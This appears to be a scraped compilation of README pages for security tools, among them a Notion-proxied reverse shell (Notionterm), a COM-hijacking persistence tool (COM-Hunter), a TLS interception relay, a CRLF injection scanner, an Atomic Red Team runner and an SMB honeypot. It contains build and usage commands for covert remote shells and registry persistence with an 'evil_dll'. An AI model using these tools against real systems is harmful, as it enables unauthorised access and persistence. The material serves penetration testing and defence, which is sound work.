We have CycloneDX and OWASP Dependency-Check integrated to check dependencies for vulnerabilities. Call mvn dependency-check:aggregate to run the OWASP Dependency-Check, and mvn cyclonedx:makeBom to have CycloneDX create an SBOM.

Automatic reload during development

To make changes reload faster, we added spring-dev-tools to the Maven project. To enable this in IntelliJ automatically, make sure:

  • Under Compiler -> Automatically build project is enabled, and
  • Under Advanced settings -> Allow auto-make to start even if developed application is currently running is enabled.

You can also manually invoke Build -> Recompile on the file you just changed; this will also force a reload of the application.

How to add a Challenge

Follow the steps below on adding a challenge:

  1. First make sure that you have an Issue reported for which a challenge is really wanted.
  2. Add the new challenge in the org.owasp.wrongsecrets.challenges folder. Make sure you add an explanation in src/main/resources/explanations and refer to it from your new Challenge class.
  3. Add a unit and integration test to show that your challenge is working.
  4. Don't forget to add the @Order annotation to your challenge ;-).

If you want to move existing cloud challenges to another cloud: extend the Challenge classes in the org.owasp.wrongsecrets.challenges.cloud package and add the required Terraform in a folder named after that cloud. Make sure that the environment is added to org.owasp.wrongsecrets.RuntimeEnvironment. Collaborate with the others on the project to get your container running so you can test it against the cloud account.



PowerGram - Multiplatform Telegram Bot In Pure PowerShell


PowerGram is a pure PowerShell Telegram Bot that can be run on Windows, Linux or Mac OS. To make use of it, you only need PowerShell 4 or higher and an internet connection.

All communication between the Bot and Telegram servers is encrypted with HTTPS, but all requests are sent with the GET method, so they could easily be intercepted.
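To illustrate the point, this is roughly what a GET-based Telegram Bot API call looks like (a minimal Python sketch of the general pattern, not PowerGram's code; the token and chat ID are placeholders):

import requests

TOKEN = "123456:REPLACE_ME"  # placeholder bot token
CHAT_ID = "111111111"        # placeholder chat ID

# The Telegram Bot API accepts GET requests; note that the token and the
# message text both end up in the URL, where intermediaries can log them.
resp = requests.get(
    f"https://api.telegram.org/bot{TOKEN}/sendMessage",
    params={"chat_id": CHAT_ID, "text": "hello from a GET request"},
)
print(resp.json())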


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PowerGram

Usage

.\PowerGram.ps1 -h

____ ____
| _ \ __ __ __ __ _ __ / ___|_ __ __ _ _ __ ___
| |_) / _ \ \ /\ / / _ \ '__| | _| '__/ _' | '_ ' _ \
| __/ (_) \ V V / __/ | | |_| | | | (_| | | | | | |
|_| \___/ \_/\_/ \___|_| \____|_| \__,_|_| |_| |_|

------------------- by @JoelGMSec -------------------

Info: PowerGram is a pure PowerShell Telegram Bot
that can be run on Windows, Linux or Mac OS

Usage: PowerGram from PowerShell
.\PowerGram.ps1 -h Show this help message
.\PowerGram.ps1 -run Start PowerGram Bot

PowerGram from Telegram
/getid Get your Chat ID from Bot
/help Show all available commands

Warning: All commands will be sent using HTTPS GET requests
You need your Chat ID & Bot Token to run PowerGram

A detailed usage guide can be found at the following link:

https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is intended exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Zap-Scripts - Zed Attack Proxy Scripts For Finding CVEs And Secrets


Zed Attack Proxy Scripts for finding CVEs and Secrets.

Building

This project uses Gradle to build the ZAP add-on. Simply run:

./gradlew build

in the main directory of the project. The add-on will be placed in the build/zapAddOn/bin/ directory.


Usage

The easiest way to use this repo in ZAP is to add the directory to the scripts directory in ZAP (under Options -> Scripts).

However, you can also build the add-on and install it (under File -> Load Add-on File...).

License

This software is distributed under the MIT License.

Credits

  • The scripts under the active directory are mostly ported from the amazing nuclei-templates repository, so huge shoutout to projectdiscovery and the community.

  • secret-finder.js uses regex patterns from the awesome gitleaks project (a toy sketch of this kind of matching follows after this list).

  • takeover-finder.js uses patterns from the awesome nuclei-templates repository.
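To give a feel for gitleaks-style pattern matching, here is a toy Python sketch (the patterns are simplified illustrations, not the add-on's actual rules):

import re

# Simplified, illustrative patterns; real gitleaks rules are far more thorough.
PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic-api-key": re.compile(r"api[_-]?key\s*[:=]\s*['\"][0-9A-Za-z]{16,}['\"]", re.I),
}

def find_secrets(text):
    # Return (rule name, match) pairs for every pattern hit in the text.
    return [(name, m.group(0)) for name, rx in PATTERNS.items() for m in rx.finditer(text)]

body = "aws_key=AKIAABCDEFGHIJKLMNOP and api_key = '0123456789abcdef0123'"
print(find_secrets(body))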

LEGAL NOTICE

THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

Get Involved

Please, send us pull requests!



MITM_Intercept - A Little Bit Less Hackish Way To Intercept And Modify non-HTTP Protocols Through Burp And Others


A little bit less hackish way to intercept and modify non-HTTP protocols through Burp and others, with SSL and TLS interception support. This tool is for researchers and application penetration testers who perform thick client security assessments.

An improved version of the fantastic mitm_relay project.


The Story

As part of our work in the research department of CyberArk Labs, we needed a way to inspect SSL and TLS communication over TCP and have the option to modify the content of packets on the fly. There are many ways to do so (for example, the known Burp Suite extension NoPE), but none of them worked for us in some cases. In the end we stumbled upon mitm_relay.

mitm_relay is a quick and easy way to perform MITM of any TCP-based protocol through existing HTTP interception software like Burp Suite's proxy. It is particularly useful for thick client security assessments. But it didn't completely work for us, so we needed to customize it. After a lot of customizations, every new change required a lot of work, and we ended up rewriting everything in a more modular way.

We hope that others will find this script helpful, and we hope that adding functionality will be easy.

How does it work

For a start, listeners' addresses and ports need to be configured. For each listener, a target (address and port) also needs to be configured. All data received from the listener is wrapped into the body of an HTTP POST request whose URL contains "CLIENT_REQUEST". All data received from the target is wrapped into the body of an HTTP POST request whose URL contains "SERVER_RESPONSE". Those requests are sent to a local HTTP interception server.

There is the option to configure an HTTP proxy and use a tool like Burp Suite as an HTTP interception tool and view the messages there. This way, it is easy to modify the messages by using Burp's "Match and Replace", extensions, or even manually (remember, the timeout mechanism of the intercepted protocol can be very short).

Another way to modify the messages is by using a python script that the HTTP interception server will run when it receives messages.

The body of the messages sent to the HTTP interception server will be printed to the shell. If a modification script is given, the messages are printed after the changes. After all the modifications, the interception server also echoes the data back as an HTTP response body.
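Conceptually, the wrapping step looks something like the following sketch (my own illustration assuming the default interception webserver address 127.0.0.1:49999, not the tool's actual code):

import requests

INTERCEPT_SERVER = "http://127.0.0.1:49999"  # default -w address (see usage below)

def relay(direction, raw_bytes):
    # direction is "CLIENT_REQUEST" or "SERVER_RESPONSE"; the raw TCP payload
    # travels as the POST body, and the (possibly modified) payload comes back
    # as the HTTP response body, ready to forward to the other side.
    resp = requests.post(f"{INTERCEPT_SERVER}/{direction}", data=raw_bytes)
    return resp.content

# Forward a captured client payload through the interception chain.
modified = relay("CLIENT_REQUEST", b"\x12\x01\x00\x08data")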

To decrypt the SSL/TLS communication, mitm_intercept needs to be provided with a certificate and a key that the client will accept when starting a handshake with the listener. If the target server requires a specific certificate for the handshake, there is an option to supply a certificate and a key for that side as well.

A small chart to show the typical traffic flow:

Differences from mitm_relay

mitm_intercept is compatible with newer versions of Python 3 (Python 3.9) and also with Windows (socket.MSG_DONTWAIT does not exist on Windows, for example). We kept the option of using STARTTLS and called it "Mixed" mode. The SSL key log file handling is updated (the built-in option to use it is new in Python 3.8), and we added the option to change the SNI header. Incoming and outgoing communication is now managed by socketserver, and all the data is sent to a subclass of ThreadingHTTPServer that handles the data representation and modification. This way, it is possible to see the changes applied by the modification script in the response (convenient when using Burp). Also, the available ciphers that the script uses can now be changed using the OpenSSL cipher list format.

Prerequisites

  1. Python 3.9
  2. requests: $ python -m pip install requests

Usage

usage: mitm_intercept.py [-h] [-m] -l [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...] -t
[u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...] [-lc <cert_path>]
[-lk <key_path>] [-tc <cert_path>] [-tk <key_path>] [-w <interface>:<port>]
[-p <addr>:<port>] [-s <script_path>] [--sni <server_name>]
[-tv <defualt|tls12|tls11|ssl3|tls1|ssl2>] [-ci <ciphers>]

mitm_intercept version 1.6

options:
-h, --help show this help message and exit
-m, --mix-connection Perform TCP relay without SSL handshake. If one of the relay sides starts an
SSL handshake, wrap the connection with SSL, and intercept the
communication. A listener certificate and private key must be provided.
-l [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...], --listen [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...]
Creates SSLInterceptServer listener that listens on the specified interface
and port. Can create multiple listeners with a space between the parameters.
Adding "u:" before the address will make the listener listen in UDP
protocol. TCP protocol is the default but adding "t:" for cleanliness is
possible. The number of listeners must match the number of targets. The i-th
listener will relay to the i-th target.
-t [u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...], --target [u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...]
Directs each SSLInterceptServer listener to forward the communication to a
target address and port. Can create multiple targets with a space between
the parameters. Adding "u:" before the address will make the target
communicate in UDP protocol. TCP protocol is the default but adding "t:" for
cleanliness is possible. The number of listeners must match the number of
targets. The i-th listener will relay to the i-th target.
-lc <cert_path>, --listener-cert <cert_path>
The certificate that the listener uses when a client contacts it. Can be a
self-signed certificate if the client will accept it.
-lk <key_path>, --listener-key <key_path>
The private key path for the listener certificate.
-tc <cert_path>, --target-cert <cert_path>
The certificate used to create a connection with the target. Can be a
self-signed certificate if the target will accept it. Not necessary if the
target doesn't require a specific certificate.
-tk <key_path>, --target-key <key_path>
The private key path for the target certificate.
-w <interface>:<port>, --webserver <interface>:<port>
Specifies the interface and the port the InterceptionServer webserver will
listen on. If omitted, the default is 127.0.0.1:49999.
-p <addr>:<port>, --proxy <addr>:<port>
Specifies the address and the port of a proxy between the InterceptionServer
webserver and the SSLInterceptServer. Can be configured so the communication
will go through a local proxy like Burp. If omitted, the communication will
be printed in the shell only.
-s <script_path>, --script <script_path>
A path to a script that the InterceptionServer webserver executes. Must
contain the function handle_request(message) that will run before sending it
to the target or handle_response(message) after receiving a message from the
target. Can be omitted if not necessary.
--sni <server_name> If there is a need to change the server name in the SSL handshake with the
target. If omitted, it will be the server name from the handshake with the
listener.
-tv <default|tls12|tls11|ssl3|tls1|ssl2>, --tls-version <default|tls12|tls11|ssl3|tls1|ssl2>
If needed, a specific TLS version can be specified.
-ci <ciphers>, --ciphers <ciphers>
Sets different ciphers than the python defaults for the TLS handshake. It
should be a string in the OpenSSL cipher list format
(https://www.openssl.org/docs/manmaster/man1/ciphers.html).

For dumping SSL (pre-)master secrets to a file, set the environment variable SSLKEYLOGFILE with a
file path. Useful for Wireshark.

The communication needs to be directed to the listener for intercepting arbitrary protocols. The way to do so depends on how the client operates. Sometimes it uses a DNS address, and changing the hosts file will be enough to resolve the listener address. If the address is hard-coded, then more creative ways need to be applied (usually some modifications of the routing table, patching the client, or using VM and iptables).

Modification Script

The HTTP interception server can run a script given to it with the flag -s. This script runs when the HTTP requests are received. The response from the HTTP interception server is the received request after running the script.

When a proxy is configured (like Burp), modifications of the request will happen before the script runs, and modifications on the response will be after that. Alterations on the request and the response by the proxy or the modification script will change the original message before going to the destination.

The script must contain the functions handle_request(message) and handle_response(message). The HTTP interception server will call handle_request(message) when the message is from the client to the server and handle_response(message) when the message is from the server to the client.

An example of a script that adds a null byte at the end of the message:

def handle_request(message):
    return message + b"\x00"

def handle_response(message):
    # Both functions must return a message.
    return message

Certificates

The tool requires a server certificate and a private key for SSL interception. Information about generating a self-signed certificate or Burp’s certificate can be found here.

If the server requires a specific certificate, a certificate and a key can be provided to the tool.

Demo

The demo below shows how to intercept a connection with MSSQL (this demo was performed on DVTA):

mitm_intercept_mssql_with_text.mp4

Connection to MSSQL is made via the TDS protocol on top of TCP. The authentication itself is performed with TLS on top of the TDS protocol. To intercept that TLS exchange, we will need two patchy modification scripts.

demo_script.py:

from time import time
from struct import pack
from pathlib import Path


def handle_request(message):

    if message.startswith(b"\x17\x03"):
        return message

    with open("msg_req" + str(time()), "wb") as f:
        f.write(message[:8])

    return message[8:]


def handle_response(message):

    if message.startswith(b"\x17\x03"):
        return message

    path = Path(".")
    try:
        msg_res = min(i for i in path.iterdir() if i.name.startswith("msg_res"))
        data = msg_res.read_bytes()
        msg_res.unlink()
    except ValueError:
        data = b'\x12\x01\x00\x00\x00\x00\x01\x00'

    return data[:2] + pack(">h", len(message)+8) + data[4:] + message

demo_script2.py:

from time import time
from struct import pack
from pathlib import Path

def handle_request(message):

    if message.startswith(b"\x17\x03"):
        return message

    path = Path(".")
    try:
        msg_req = min(i for i in path.iterdir() if i.name.startswith("msg_req"))
        data = msg_req.read_bytes()
        msg_req.unlink()
    except ValueError:
        data = b'\x12\x01\x00\x00\x00\x00\x01\x00'

    return data[:2] + pack(">h", len(message)+8) + data[4:] + message


def handle_response(message):

    if message.startswith(b"\x17\x03"):
        return message

    with open("msg_res" + str(time()), "wb") as f:
        f.write(message[:8])

    return message[8:]

With those patchy scripts we will see some of the TLS communication, but then the client will fail (because the hacky scripts badly alter the TDS communication outside of the TLS part).

mitm_intercept_mssql_tls.mp4

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.



Notionterm - Embed Reverse Shell In Notion Pages

Embed reverse shell in Notion pages.
Hack while taking notes

FOR:

  • Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
  • Demo/Quick proof insertion within report
  • Highly available and shareable reverse shell (desktop, browser, mobile)
  • Encrypted and authenticated remote shell

NOT FOR:

  • Long and interactive shell session (see tacos for that)

Why?

The focus was on making something fun while still being usable, but it's not meant to be THE solution for reverse shells in the pentester's arsenal.

How?

Just use notion as usual and launch notionterm on target.

Requirements

  • Notion software and API key
  • Allowed HTTP communication from the target to the notion domain
  • Prior RCE on target

Roughly inspired by the great ideas of OffensiveNotion and notionion!

Quickstart

Set-up

  1. Create a page and give the integration API key permission to write to that page
  2. Build notionterm and transfer it onto the target machine (see install)


Run

There are 3 main ways to run notionterm:

"normal" mode
Get terminal, stop/unstop it, etc...
notionterm [flags]
Start the shell with the button widget: turn ON, do your reverse shell stuff, turn OFF to pause, turn ON to resume, etc.
"server" mode
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with a URL containing the page id (CTRL+L to get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light mode
Only perform HTTP traffic from target → notion
notionterm light [flags]

Install

As notionterm is meant to run on the target machine, it must be built to match it.

Thus, set the env var to match the target:

GOOS=[windows/linux/darwin]

Simple build

git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

You will need to set the API key and Notion page URL using either env vars (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url).

"All-inclusive" build

Embed the Notion integration API token and Notion page URL directly in the binary.

Warning: everybody with access to the binary can retrieve the token. For security reasons, don't share it and remove it after use.

Set according env var:

export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

And build it:

git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN


Atomic-Operator - A Python Package Is Used To Execute Atomic Red Team Tests (Atomics) Across Multiple Operating System Environments


This python package is used to execute Atomic Red Team tests (Atomics) across multiple operating system environments.

(What's new?)


Why?

atomic-operator enables security professionals to test their detection and defensive capabilities against prescribed techniques defined within atomic-red-team. By utilizing a testing framework such as atomic-operator, you can identify both your defensive capabilities as well as gaps in defensive coverage.

Additionally, atomic-operator can be used in many other situations like:

  • Generating alerts to test products
  • Testing EDR and other security tools
  • Identifying ways to perform defensive evasion from an adversary perspective
  • Plus more.

Features

  • Supports local and remote execution of Atomic Red Team tests on Windows, macOS, and Linux systems
  • Supports running atomic-tests against iaas:aws
  • Can prompt for input arguments, but is not required to
  • Assist with downloading the atomic-red-team repository
  • Can be automated further based on a configuration file
  • A command-line and importable Python package
  • Select specific tests when one or more techniques are specified
  • Plus more

Getting Started

atomic-operator is a Python-only package hosted on PyPi and works with Python 3.6 and greater.

If you want a PowerShell version, please check out Invoke-AtomicRedTeam.

pip install atomic-operator

The next steps will guide you through setting up and running atomic-operator.

Installation

You can install atomic-operator on OS X, Linux, or Windows. You can also install it directly from the source. To install, see the commands under the relevant operating system heading, below.

Prerequisites

The following libraries are required and installed by atomic-operator:

pyyaml==5.4.1
fire==0.4.0
requests==2.26.0
attrs==21.2.0
pick==1.2.0

macOS, Linux and Windows:

pip install atomic-operator

macOS using M1 processor

git clone https://github.com/swimlane/atomic-operator.git
cd atomic-operator

# Satisfy ModuleNotFoundError: No module named 'setuptools_rust'
brew install rust
pip3 install --upgrade pip
pip3 install setuptools_rust

# Back to our regularly scheduled programming . . .
pip install -r requirements.txt
python setup.py install

Installing from source

git clone https://github.com/swimlane/atomic-operator.git
cd atomic-operator
pip install -r requirements.txt
python setup.py install

Usage example (command line)

You can run atomic-operator from the command line or within your own Python scripts. To use atomic-operator at the command line simply enter the following in your terminal:

atomic-operator --help
atomic-operator run -- --help

Please note: to see details about the run command, run atomic-operator run -- --help and NOT atomic-operator run --help.

Retrieving Atomic Tests

In order to use atomic-operator you must have one or more atomic-red-team tests (Atomics) on your local system. atomic-operator provides you with the ability to download the Atomic Red Team repository. You can do so by running the following at the command line:

atomic-operator get_atomics 
# You can specify the destination directory by using the --destination flag
atomic-operator get_atomics --destination "/tmp/some_directory"

Running Tests Locally

In order to run a test you must provide some additional properties (and options if desired). The main method to run tests is named run.

# This will run ALL tests compatible with your local operating system
atomic-operator run --atomics-path "/tmp/some_directory/redcanaryco-atomic-red-team-3700624"

You can select individual tests when you provide one or more specific techniques. For example running the following on the command line:

atomic-operator run --techniques T1564.001 --select_tests

This will prompt the user with a selection list of tests associated with that technique. A user can select one or more tests by using the space bar to highlight the desired test:

 Select Test(s) for Technique T1564.001 (Hide Artifacts: Hidden Files and Directories)

* Create a hidden file in a hidden directory (61a782e5-9a19-40b5-8ba4-69a4b9f3d7be)
Mac Hidden file (cddb9098-3b47-4e01-9d3b-6f5f323288a9)
Create Windows System File with Attrib (f70974c8-c094-4574-b542-2c545af95a32)
Create Windows Hidden File with Attrib (dadb792e-4358-4d8d-9207-b771faa0daa5)
Hidden files (3b7015f2-3144-4205-b799-b05580621379)
Hide a Directory (b115ecaf-3b24-4ed2-aefe-2fcb9db913d3)
Show all hidden files (9a1ec7da-b892-449f-ad68-67066d04380c)

Running Tests Remotely

In order to run a test remotely you must provide some additional properties (and options if desired). The main method to run tests is named run.

# This will run ALL tests compatible with the remote operating system
atomic-operator run --atomics-path "/tmp/some_directory/redcanaryco-atomic-red-team-3700624" --hosts "10.32.1.0" --username "my_username" --password "my_password"

When running commands remotely against Windows hosts you may need to configure PSRemoting. See details here: Windows Remoting

Additional parameters

You can see additional parameters by running the following command:

atomic-operator run -- --help
Parameter Name | Type | Default | Description
techniques | list | all | One or more defined techniques by attack_technique ID.
test_guids | list | None | One or more Atomic test GUIDs.
select_tests | bool | False | Select one or more atomic tests to run when techniques are specified.
atomics_path | str | os.getcwd() | The path of Atomic tests.
check_prereqs | bool | False | Whether or not to check for prereq dependencies (prereq_command).
get_prereqs | bool | False | Whether or not you want to retrieve prerequisites.
cleanup | bool | False | Whether or not you want to run cleanup command(s).
copy_source_files | bool | True | Whether or not you want to copy any related source (src, bin, etc.) files to a remote host.
command_timeout | int | 20 | Time duration for each command before timeout.
debug | bool | False | Whether or not you want to output details about tests being run.
prompt_for_input_args | bool | False | Whether you want to prompt for input arguments for each test.
return_atomics | bool | False | Whether or not you want to return atomics instead of running them.
config_file | str | None | A path to a config_file which is used to automate atomic-operator in environments.
config_file_only | bool | False | Whether or not you want to run tests based on the provided config_file only.
hosts | list | None | A list of one or more remote hosts to run a test on.
username | str | None | Username for authentication of remote connections.
password | str | None | Password for authentication of remote connections.
ssh_key_path | str | None | Path to an SSH key for authentication of remote connections.
private_key_string | str | None | A private SSH key string used for authentication of remote connections.
verify_ssl | bool | False | Whether or not to verify SSL when connecting over RDP (Windows).
ssh_port | int | 22 | SSH port for authentication of remote connections.
ssh_timeout | int | 5 | SSH timeout for authentication of remote connections.
**kwargs | dict | None | Additional flags passed into the run command will be matched with defined inputs within Atomic tests, and their values replaced with the provided values.

You should see a similar output to the following:

NAME
atomic-operator run - The main method in which we run Atomic Red Team tests.

SYNOPSIS
atomic-operator run <flags>

DESCRIPTION
The main method in which we run Atomic Red Team tests.

FLAGS
--techniques=TECHNIQUES
Type: list
Default: ['all']
One or more defined techniques by attack_technique ID. Defaults to 'all'.
--test_guids=TEST_GUIDS
Type: list
Default: []
One or more Atomic test GUIDs. Defaults to None.
--select_tests=SELECT_TESTS
Type: bool
Default: False
Select one or more tests from provided techniques. Defaults to False.
--atomics_path=ATOMICS_PATH
Default: '/U...
The path of Atomic tests. Defaults to os.getcwd().
--check_prereqs=CHECK_PREREQS
Default: False
Whether or not to check for prereq dependencies (prereq_command). Defaults to False.
--get_prereqs=GET_PREREQS
Default: False
Whether or not you want to retrieve prerequisites. Defaults to False.
--cleanup=CLEANUP
Default: False
Whether or not you want to run cleanup command(s). Defaults to False.
--copy_source_files=COPY_SOURCE_FILES
Default: True
Whether or not you want to copy any related source (src, bin, etc.) files to a remote host. Defaults to True.
--command_timeout=COMMAND_TIMEOUT
Default: 20
Timeout duration for each command. Defaults to 20.
--debug=DEBUG
Default: False
Whether or not you want to output details about tests being ran. Defaults to False.
--prompt_for_input_args=PROMPT_FOR_INPUT_ARGS
Default: False
Whether you want to prompt for input arguments for each test. Defaults to False.
--return_atomics=RETURN_ATOMICS
Default: False
Whether or not you want to return atomics instead of running them. Defaults to False.
--config_file=CONFIG_FILE
Type: Optional[]
Default: None
A path to a config_file which is used to automate atomic-operator in environments. Defaults to None.
--config_file_only=CONFIG_FILE_ONLY
Default: False
Whether or not you want to run tests based on the provided config_file only. Defaults to False.
--hosts=HOSTS
Default: []
A list of one or more remote hosts to run a test on. Defaults to [].
--username=USERNAME
Type: Optional[]
Default: None
Username for authentication of remote connections. Defaults to None.
--password=PASSWORD
Type: Optional[]
Default: None
Password for authentication of remote connections. Defaults to None.
--ssh_key_path=SSH_KEY_PATH
Type: Optional[]
Default: None
Path to a SSH Key for authentication of remote connections. Defaults to None.
--private_key_string=PRIVATE_KEY_STRING
Type: Optional[]
Default: None
A private SSH Key string used for authentication of remote connections. Defaults to None.
--verify_ssl=VERIFY_SSL
Default: False
Whether or not to verify ssl when connecting over RDP (windows). Defaults to False.
--ssh_port=SSH_PORT
Default: 22
SSH port for authentication of remote connections. Defaults to 22.
--ssh_timeout=SSH_TIMEOUT
Default: 5
SSH timeout for authentication of remote connections. Defaults to 5.
Additional flags are accepted.
If provided, keys matching inputs for a test will be replaced. Default is None.

Running atomic-operator using a config_file

In addition to the ability to pass in parameters with atomic-operator you can also pass in a path to a config_file that contains all the atomic tests and their potential inputs. You can see an example of this config_file here:

atomic_tests:
- guid: f7e6ec05-c19e-4a80-a7e7-241027992fdb
  input_arguments:
    output_file:
      value: custom_output.txt
    input_file:
      value: custom_input.txt
- guid: 3ff64f0b-3af2-3866-339d-38d9791407c3
  input_arguments:
    second_arg:
      value: SWAPPPED argument
- guid: 32f90516-4bc9-43bd-b18d-2cbe0b7ca9b2
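With such a file in place, the same tests can be driven from Python as well; a minimal sketch, assuming the file is saved locally as config.yaml:

from atomic_operator import AtomicOperator

operator = AtomicOperator()
# Run only the tests listed in the config file; the path is a placeholder.
operator.run(config_file="config.yaml", config_file_only=True)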

Usage example (scripts)

To use atomic-operator you must instantiate an AtomicOperator object.

import os

from atomic_operator import AtomicOperator

operator = AtomicOperator()

# This will download a local copy of the atomic-red-team repository

print(operator.get_atomics('/tmp/some_directory'))

# this will run tests on your local system
operator.run(
    techniques='all',
    atomics_path=os.getcwd(),
    check_prereqs=False,
    get_prereqs=False,
    cleanup=False,
    command_timeout=20,
    debug=False,
    prompt_for_input_args=False
)

Getting Help

Please create an issue if you have questions or run into any issues.

Built With

  • carcass - Python packaging template

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

We use SemVer for versioning.

Authors

See also the list of contributors who participated in this project.

License

This project is licensed under the MIT License - see the LICENSE file for details

Shoutout

  • Thanks to keithmccammon for helping identify issues with macOS M1-based processors and providing a fix


SMB-Session-Spoofing - Tool To Create A Fake SMB Session


Welcome! This is a utility that can be compiled with Visual Studio 2019 (or newer). The goal of this program is to create a fake SMB Session. The primary purpose of this is to serve as a method to lure attackers into accessing a honey-device. This program comes with no warranty or guarantees.


Program Modifications Instructions

This program will require you to modify the code slightly. On line 144, the CreateProcessWithLogonW Windows API is called; two parameters have been supplied by default - svc-admin (the username) and contoso.com (the domain). You must change these values to something that matches your production network.

CreateProcessWithLogonW(L"DomainAdminUser", L"YourDomain.com", NULL, LOGON_NETCREDENTIALS_ONLY, <snip>);

Implementation Instructions

After modifying the code and compiling it, you must then install the service. You can do so with the following command:

sc create servicename binPath= "C:\ProgramData\Services\Inject\service.exe" start= auto

Verification Steps

To verify the program is functioning correctly, you should check and see what sessions exist on the system. This can be done with the following command:

C:\ProgramData\Services\Inject> net sessions
Computer                User name       Client Type     Opens   Idle time

-------------------------------------------------------------------------------
\\[::1]                 svc-admin                       0       00:00:04
The command completed successfully.

You should check back in about 13 minutes to verify that a new session has been created and the program is working properly.

What an Attacker Sees

The theory behind this is that when an adversary runs SharpHound, collects sessions, and analyzes attack paths from owned principals, they can identify that a highly privileged user is signed in on Tier-2 infrastructure (workstations), which (it appears) they can then access and dump credentials on to gain Domain Admin access.


In the scenario above, an attacker has compromised the user "wadm-tom@contoso.com", who is a Local Administrator on lab-wkst-2.contoso.com. The user svc-admin is logged in on lab-wkst-2.contoso.com, meaning that all the attacker has to do is sign into the workstation, run Mimikatz, and dump credentials. So, how do you monitor for this?

How you Should Configure Monitoring

Implementing this tool is important, but so is monitoring; if you deploy it with no monitoring, it is effectively useless. The most effective way to monitor this host is to alert on any logon. This program is best utilized on a host with no user activity that is joined to the domain with standard corporate monitoring tools (EDR, AV, Windows Event Log Forwarding, etc.). It is highly recommended that you have an email alert, an SMS alert, and as many other alerts as possible to ensure that incidents involving this machine are triaged as quickly as possible, since it has the highest probability of a real adversary engaging with the workstation in question.

Credits

Thank you to Microsoft for providing the service template code and for the excellent Windows API Documentation.



CRLFsuite - Fast CRLF Injection Scanning Tool


CRLFsuite is a fast tool specially designed to scan for CRLF injection.
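For background, a CRLF injection check boils down to sending URL-encoded \r\n sequences and looking for them reflected in the response headers. A toy Python sketch of the idea (not CRLFsuite's actual logic; the payload and target are illustrative):

import requests

# %0d%0a are the URL-encoded CR and LF characters.
payload = "/%0d%0aSet-Cookie:crlf=injected"
resp = requests.get("http://testphp.vulnweb.com" + payload, allow_redirects=False)

# If the server reflects the CRLF into the response, a new Set-Cookie
# header appears, indicating header injection.
if "crlf=injected" in resp.headers.get("Set-Cookie", ""):
    print("Possible CRLF injection!")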


Installation

$ git clone https://github.com/Nefcore/CRLFsuite.git
$ cd CRLFsuite
$ sudo python3 setup.py install
$ crlfsuite -h

Features

  • Single URL scanning
  • Multiple URL scanning
  • Stdin supported
  • GET & POST method supported
  • Concurrency
  • Best Payloads list
  • Headers supported
  • Fast and efficient scanning with negligible false positives

Usage

Single URL scanning:

$ crlfsuite -u "http://testphp.vulnweb.com"

Multiple URLs scanning:

$ crlfsuite -i targets.txt

From stdin:

$ subfinder -d google.com -silent | httpx -silent | crlfsuite -s

Specifying cookies:

$ crlfsuite -u "http://testphp.vulnweb.com" --cookies "key=val; newkey=newval"

Using POST method:

$ crlfsuite -i targets.txt -m POST -d "key=val&newkey=newval"

Bug report

If you're facing errors or issues with this tool, you can open an issue here:

Open an issue

COM-Hunter - COM Hijacking VOODOO


COM Hijacking VOODOO

COM-Hunter is a COM Hijacking persistence tool written in C#.

This tool was inspired by the RTO course of @zeropointsecltd.


Features

  • Finds valid CLSID entries on the victim's machine.
  • Finds valid CLSIDs via Task Scheduler on the victim's machine.
  • Finds out if someone has already used any of those valid CLSIDs for COM persistence (LocalServer32/InprocServer32).
  • Finds out if someone has already used any valid CLSID via Task Scheduler for COM persistence (LocalServer32/InprocServer32).
  • Tries to automatically achieve COM Hijacking persistence with general valid CLSIDs (LocalServer32/InprocServer32).
  • Tries to automatically achieve COM Hijacking persistence via Task Scheduler.
  • Tries to use the "TreatAs" key in order to refer to a different component.

Special Thanks

License

Copyright (c) 2022 Nikos Vourdas


.NET Framework

4.8

Usage

[+] Usage:

.\COM-Hunter.exe <mode> <options>

-> General Options:
-h, --help Shows help and exits.
-v, --version Shows current version and exits.
-a, --about Shows info, credits about the tool and exits.

-> Modes:
Search Search Mode
Persist Persist Mode

-> Search Mode:
Get-Entry Searches for valid CLSIDs entries.
Get-Tasksch Searches for valid CLSIDs entries via Task Scheduler.
Find-Persist Searches if someone already used a valid CLSID (Defence).
Find-Tasksch Searches if someone already used a valid CLSID via Task Scheduler (Defence).

-> Persist Mode:
General Uses General method to apply COM Hijacking Persistence in Registry.
Tasksch Try to do COM Hijacking Persistence via Task Scheduler.
TreatAs Uses TreatAs Registry key to apply COM Hijacking Persistence in Registry.

-> General Usage:
.\COM-Hunter.exe Persist General <clsid> <full_path_of_evil_dll>

-> Tasksch Usage:
